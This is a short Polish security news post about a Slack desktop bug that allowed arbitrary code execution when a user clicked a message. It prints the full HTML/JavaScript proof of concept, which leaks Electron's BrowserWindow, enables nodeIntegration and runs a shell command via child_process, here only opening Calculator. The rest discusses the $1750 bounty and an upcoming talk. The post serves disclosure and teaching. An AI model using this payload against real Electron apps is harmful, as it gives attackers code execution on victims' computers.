Wykonywanie dowolnego kodu w aplikacji desktopowej Slack, bounty: 1750$

Od kilku dni głośno jest o błędzie w Slacku, który umożliwiał wykonanie dowolnego kodu na komputerze, gdzie jedyną interakcją użytkownika było kliknięcie na wiadomość:

<html>
<body>
<script>
  // overwrite functions to get a BrowserWindow object:
  window.desktop.delegate = {}
  window.desktop.delegate.canOpenURLInWindow = () => true
  window.desktop.window = {}
  window.desktop.window.open = () => 1
  bw = window.open('about:blank') // leak BrowserWindow class
  nbw = new bw.constructor({show: false, webPreferences: {nodeIntegration: true}}) // let's make our own with nodeIntegration
  nbw.loadURL('about:blank') // need to load some URL for interaction
  nbw.webContents.executeJavaScript('this.require("child_process").exec("open /Applications/Calculator.app")') // exec command
</script>
</body>
</html>

Slack wypłacił bounty w wysokości 1750$, co zostało w społeczności odebrane jako dość niska kwota – a pojawiły się nawet kontrowersyjne wpisy innych firm, mówiące, że za ten sam błąd zapłaciłyby ponad 10000$.

Dokładniej technicznie temu błędowi przyjrzymy się podczas najbliższego BOTW w czwartek o 19:00.

–mb